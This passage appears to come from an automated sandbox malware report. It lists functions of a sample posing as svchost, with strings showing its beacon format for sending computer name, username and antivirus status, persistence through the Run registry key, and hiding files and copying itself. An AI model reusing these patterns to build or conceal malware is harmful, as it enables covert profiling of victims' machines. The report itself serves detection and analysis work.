                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep$DirectoryInformationVolumeWindows_errno_invalid_parameter_noinfo_snprintfwsprintf
                                                                                        • String ID: data=$err$task=1&uid=%s
                                                                                        • API String ID: 1865811002-1781340663
                                                                                        • Opcode ID: 0af1d471e20986adbd40fd4a058f03d5b486d937defcffe757d3d044ca000848
                                                                                        • Instruction ID: a99fa9a935495774ae563c3f344e61b37fa44fc36c82cea1e1a2bd09c332fe87
                                                                                        • Opcode Fuzzy Hash: 0af1d471e20986adbd40fd4a058f03d5b486d937defcffe757d3d044ca000848
                                                                                        • Instruction Fuzzy Hash: D3414F2261C68586E760DF14E4543AAB7A1F7C8794F648631E68EC3BE8DF3CD949CB00
                                                                                        Function 00007FF60BF82BEC Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 69COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: shared_ptrtype_info::_name_internal_method
                                                                                        • String ID: $0$@$\??\
                                                                                        • API String ID: 1070490614-1644384263
                                                                                        • Opcode ID: 80fea6cff64a10e925d1ccc44b306e79c79c634c3964aa946b29e6fce584649f
                                                                                        • Instruction ID: 8595011f0ef97a617fec78e7ed0be17f4f084afeff0c9e67480426fd797a886c
                                                                                        • Opcode Fuzzy Hash: 80fea6cff64a10e925d1ccc44b306e79c79c634c3964aa946b29e6fce584649f
                                                                                        • Instruction Fuzzy Hash: 64310832218A859AD750CB15E45439AB7A1F7887A0FA04235E79D83BF9EF7CC148CB40
                                                                                        Function 00007FF60BFA03F4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                        • String ID: Unknown
                                                                                        • API String ID: 4220601557-1654365787
                                                                                        • Opcode ID: 1dfae691d3f300e8eb9ec59fb40c600c63e8ff47fd4a1043f669c2907b9887a7
                                                                                        • Instruction ID: 8e74c1a83af79c8a6b7a9df7adbe86d00959af9a339c3651680c7cbed87c5ce7
                                                                                        • Opcode Fuzzy Hash: 1dfae691d3f300e8eb9ec59fb40c600c63e8ff47fd4a1043f669c2907b9887a7
                                                                                        • Instruction Fuzzy Hash: 4421D67261CA8486DB70DB19F48476AA3A4F78CB44F205635EA8EC3B68EF3DD554CB00
                                                                                        Function 00007FF60BFA0798 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF60BFA1174: GetWindowsDirectoryW.KERNEL32 ref: 00007FF60BFA11AB
                                                                                          • Part of subcall function 00007FF60BFA1174: GetVolumeInformationW.KERNEL32 ref: 00007FF60BFA124C
                                                                                          • Part of subcall function 00007FF60BFA1174: wsprintfW.USER32 ref: 00007FF60BFA12DB
                                                                                          • Part of subcall function 00007FF60BFA0844: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60BFA07CD), ref: 00007FF60BFA088D
                                                                                          • Part of subcall function 00007FF60BFA0844: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60BFA07CD), ref: 00007FF60BFA08A2
                                                                                          • Part of subcall function 00007FF60BFA0844: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60BFA07CD), ref: 00007FF60BFA08B5
                                                                                          • Part of subcall function 00007FF60BFA0844: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60BFA07CD), ref: 00007FF60BFA08C5
                                                                                          • Part of subcall function 00007FF60BFA0844: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60BFA07CD), ref: 00007FF60BFA08D8
                                                                                          • Part of subcall function 00007FF60BFA0844: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60BFA07CD), ref: 00007FF60BFA08ED
                                                                                          • Part of subcall function 00007FF60BFA0844: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60BFA07CD), ref: 00007FF60BFA0900
                                                                                          • Part of subcall function 00007FF60BFA0844: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF60BFA07CD), ref: 00007FF60BFA0915
                                                                                        • GetModuleFileNameW.KERNEL32 ref: 00007FF60BFA07DD
                                                                                        • DeleteFileW.KERNEL32 ref: 00007FF60BFA07E8
                                                                                        • CopyFileW.KERNEL32 ref: 00007FF60BFA0801
                                                                                        • SetFileAttributesW.KERNEL32 ref: 00007FF60BFA0819
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                        • String ID: Services
                                                                                        • API String ID: 3209240227-2319745855
                                                                                        • Opcode ID: 823e6759efeda70e4ef3bae70da677e340206dab9cd5a6f55dc8ef6d8ad068b5
                                                                                        • Instruction ID: a39409451b09ae5346bd107151d8dfae8b9f842430323db5e87bce859a6c4c85
                                                                                        • Opcode Fuzzy Hash: 823e6759efeda70e4ef3bae70da677e340206dab9cd5a6f55dc8ef6d8ad068b5
                                                                                        • Instruction Fuzzy Hash: 15014461B1C542A2DB50DB34E4543AA5360FB98744FA09432D64FC36B5EE2DD24ACF44
                                                                                        Function 00007FF60BFA02E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenValue
                                                                                        • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                        • API String ID: 779948276-85274793
                                                                                        • Opcode ID: beb93c632a34156963fe64735a9b928f099ba9484622690a6d160c2725b03238
                                                                                        • Instruction ID: c2534fde37468fb1b7d1d378fc841a9d2cb62c6bb4ed40e64e40a736cd4cd536
                                                                                        • Opcode Fuzzy Hash: beb93c632a34156963fe64735a9b928f099ba9484622690a6d160c2725b03238
                                                                                        • Instruction Fuzzy Hash: 8B01ED76629B4086D7909B14F44475AB7A4F789794F505125FB8E83B68DF3CC154CF04
                                                                                        Function 00007FF60BF813A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: @$IsWow64Process$kernel32
                                                                                        • API String ID: 1646373207-1447682865
                                                                                        • Opcode ID: ab93a9697e7db49f45cab12df12d8e20f72fdeb3fe900da885d9202ed212137f
                                                                                        • Instruction ID: 5dfff222ceb639354eb6b2ee8b7cf1a9787267824960b1bdf4b4ada1d095b124
                                                                                        • Opcode Fuzzy Hash: ab93a9697e7db49f45cab12df12d8e20f72fdeb3fe900da885d9202ed212137f
                                                                                        • Instruction Fuzzy Hash: 3001FF2190C64692EB309F16E44476AB7A0FB8D748F604234D68FD76B8DF7CD64ACB00
                                                                                        Function 00007FF60BF834F0 Relevance: 7.6, APIs: 5, Instructions: 119fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileLibraryLoad$CreateModuleName
                                                                                        • String ID:
                                                                                        • API String ID: 1423211558-0
                                                                                        • Opcode ID: 7834f4e908498ff53ae9107ca55e82e527c538c5482dbe6334d9e00c9c33f287
                                                                                        • Instruction ID: cafb601cf7fc73aa25403b8bd47db3afa3fb70a5fa66b9e94edd03215da0d07c
                                                                                        • Opcode Fuzzy Hash: 7834f4e908498ff53ae9107ca55e82e527c538c5482dbe6334d9e00c9c33f287
                                                                                        • Instruction Fuzzy Hash: 79510B7260CA8185E7609B26E45436FB7A1FB89780F608135EACEC7AB9DF7DD445CB00
                                                                                        Function 00007FF60BFAF758 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                        • String ID:
                                                                                        • API String ID: 2998201375-0
                                                                                        • Opcode ID: 5223744fd3fccca467624dc8a192276cd82e61384c6ea2980f54dffe725d773f
                                                                                        • Instruction ID: 6e3836d01e7c4b6dc1623da82db2c626f69ae7d1cd00d64fc4581d60edf33e15
                                                                                        • Opcode Fuzzy Hash: 5223744fd3fccca467624dc8a192276cd82e61384c6ea2980f54dffe725d773f
                                                                                        • Instruction Fuzzy Hash: F5419775A1878286E7648F15954057DB7A5FF88B80F248135DB4EDBBA5DF3CE4418B00
                                                                                        Function 00007FF60BFA12F4 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                        • String ID:
                                                                                        • API String ID: 2850635065-0
                                                                                        • Opcode ID: 0e751263ca790cefd0de29730052997415424a4d3fcfa03dfa405769945a3833
                                                                                        • Instruction ID: 5dd0696f6e97e9fa1240f8381b275ee43262a527f56887398b9bca1729fd10c9
                                                                                        • Opcode Fuzzy Hash: 0e751263ca790cefd0de29730052997415424a4d3fcfa03dfa405769945a3833
                                                                                        • Instruction Fuzzy Hash: E2110071A1C64296E7609F11F54833AB7A0FB897A4F608635E59FC3AB8DF3CD6548B00
                                                                                        Function 00007FF60BFA29AC Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: _getptd$_inconsistency$DecodePointer_getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 3566995948-0
                                                                                        • Opcode ID: ee8c12c8554f5530bc3b28713b5296e1af5c1cc8e122cf2103e50e6ee38f58da
                                                                                        • Instruction ID: 9fec831de16345c107c5e81c27f40c330966e67de6fd07f7be07bb20bfd80ad8
                                                                                        • Opcode Fuzzy Hash: ee8c12c8554f5530bc3b28713b5296e1af5c1cc8e122cf2103e50e6ee38f58da
                                                                                        • Instruction Fuzzy Hash: 41F089A1B08586D0EA586B65E0811FC6254FF5CFC0F2CC131D74ED7297DE18E4909B10
                                                                                        Function 00007FF60BF9D070 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 108COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Version_snprintf
                                                                                        • String ID: 3.2$info=1&uid=%s&ver=%s&os=%u.%u.%u&cmpname=%s&username=%s&ut=%d&av=%d
                                                                                        • API String ID: 2221195653-1629646224
                                                                                        • Opcode ID: d8e065c0954a299e65155b93d3e3b5ceec94708ba317d722836e874e1f68d53d
                                                                                        • Instruction ID: eb77c3f3527ade9152fb54bfc71b80f7307c28df2458fa724f7dde2e51dfa10a
                                                                                        • Opcode Fuzzy Hash: d8e065c0954a299e65155b93d3e3b5ceec94708ba317d722836e874e1f68d53d
                                                                                        • Instruction Fuzzy Hash: 9A51A576608AC59AD764CF15E8543AAB7A1F7C8790F604135EA9EC3BA8DF7CD444CB00
                                                                                        Function 00007FF60BFA1174 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                        • String ID: %08lX%04lX%lu
                                                                                        • API String ID: 3001812590-640692576
                                                                                        • Opcode ID: 08c2cf307d83d8194dc8edf4cd8c2b41345a18135c499c6c05916fe6c666ad14
                                                                                        • Instruction ID: cacf597020d2bbb812abcb1a583d3fbd9feb8f68d636e9170fbf56aef1355d7b
                                                                                        • Opcode Fuzzy Hash: 08c2cf307d83d8194dc8edf4cd8c2b41345a18135c499c6c05916fe6c666ad14
                                                                                        • Instruction Fuzzy Hash: 5B41396261C24186E7149B68F45536AB7A0FBCA704F60513AE78ED7BA8EF3DD944CF00
                                                                                        Function 00007FF60BFA1590 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _callnewh.LIBCMT ref: 00007FF60BFA159E
                                                                                        • malloc.LIBCMT ref: 00007FF60BFA15AA
                                                                                          • Part of subcall function 00007FF60BFA244C: _FF_MSGBANNER.LIBCMT ref: 00007FF60BFA247C
                                                                                          • Part of subcall function 00007FF60BFA244C: _NMSG_WRITE.LIBCMT ref: 00007FF60BFA2486
                                                                                          • Part of subcall function 00007FF60BFA244C: HeapAlloc.KERNEL32(?,?,00000000,00007FF60BFA4284,?,?,?,00007FF60BFAAD9C,?,?,?,00007FF60BFAAC9B,?,?,00000000,00007FF60BFA5832), ref: 00007FF60BFA24A1
                                                                                          • Part of subcall function 00007FF60BFA244C: _callnewh.LIBCMT ref: 00007FF60BFA24BA
                                                                                          • Part of subcall function 00007FF60BFA244C: _errno.LIBCMT ref: 00007FF60BFA24C5
                                                                                          • Part of subcall function 00007FF60BFA244C: _errno.LIBCMT ref: 00007FF60BFA24D0
                                                                                        • _CxxThrowException.LIBCMT ref: 00007FF60BFA15F3
                                                                                          • Part of subcall function 00007FF60BFA2504: RtlPcToFileHeader.NTDLL ref: 00007FF60BFA2593
                                                                                          • Part of subcall function 00007FF60BFA2504: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF60BFB04BE), ref: 00007FF60BFA25D2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception_callnewh_errno$AllocFileHeaderHeapRaiseThrowmalloc
                                                                                        • String ID: bad allocation
                                                                                        • API String ID: 1214304046-2104205924
                                                                                        • Opcode ID: 3b8e8bd193397a22c989b775499798885fd0ff8c1caff98f5e3a105427b3f2ea
                                                                                        • Instruction ID: 289b44b7dde505adeab9183f2f078ad35eca83655a236fc4bba8fdffa5e25275
                                                                                        • Opcode Fuzzy Hash: 3b8e8bd193397a22c989b775499798885fd0ff8c1caff98f5e3a105427b3f2ea
                                                                                        • Instruction Fuzzy Hash: 9D01ACA5F0874784EE189751A4501B85354EF4E384F68C030DA4EC7BBAEE7CE241CB00
                                                                                        Function 00007FF60BFA0F48 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenValue
                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                        • API String ID: 779948276-1428018034
                                                                                        • Opcode ID: 4a561f427d5a0833e66d88e195127c8b8fb31ed43f9b64d14c46dfc272e21bc7
                                                                                        • Instruction ID: ad2cccb25abd234a268222b230b6613b80a17655cc40e098a7c369607d90cf4b
                                                                                        • Opcode Fuzzy Hash: 4a561f427d5a0833e66d88e195127c8b8fb31ed43f9b64d14c46dfc272e21bc7
                                                                                        • Instruction Fuzzy Hash: 69111A76518B8186DB908F14F44566AB7A0F7897A0F609221EA9E83BB8DF3DD184CF00
                                                                                        Function 00007FF60BFB56A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2191723275.00007FF60BF81000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF60BF80000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2191479740.00007FF60BF80000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2191881727.00007FF60BFB6000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192031313.00007FF60BFC4000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192106062.00007FF60BFCA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2192224584.00007FF60BFD1000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff60bf80000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                        • String ID: csm
                                                                                        • API String ID: 2821275340-1018135373
                                                                                        • Opcode ID: c927b15099e8d8d8a14847beea8bde30514249613e58caf7d211df8e6c6ec09d
                                                                                        • Instruction ID: 91913236be99c04f7f7a6a6d6d8e60065c943db3878aa19aaef6eca95f6bf318
                                                                                        • Opcode Fuzzy Hash: c927b15099e8d8d8a14847beea8bde30514249613e58caf7d211df8e6c6ec09d
                                                                                        • Instruction Fuzzy Hash: 8101A762D0428685DB24AF35D8D16BC3355EB7CB45F249035D90ECF656CE28E880C700
                                                                                        Function 00007FF60BF822BC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
